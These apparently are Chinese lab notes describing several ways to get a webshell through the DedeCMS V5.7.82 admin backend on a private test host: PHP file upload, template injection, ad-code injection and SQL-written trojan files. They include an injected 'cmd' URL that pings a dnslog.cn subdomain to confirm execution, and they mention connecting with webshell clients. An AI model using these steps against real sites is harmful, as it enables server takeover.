文件管理器

点击模块，选择上传文件

 在电脑中新建2.php

<?php phpinfo();?>

 访问2.php,验证是否成功

 修改模板文件

在模块中找到index.htm

在index.htm加上<?php phpinfo();?>

 点击生成->更新主页HTML,将index.html改为index.php

访问index.php,验证是否成功

 后台任意命令执行

点击广告管理->增加广告

<?php phpinfo();?>

 点击[代码]

 得到地址

访问地址，无回显

http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1

 在dnslog.cn上获得一个网址

再次访问，这样若成功将木马植入的话dnslog会显示访问记录

http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1&cmd=ping%20cs8vcw.dnslog.cn

后台sql命令执行

尝试查询basedir 

 在得到的目录下写入木马文件

 访问后得到12.php

这些成功后可以用蚁剑，caidao连接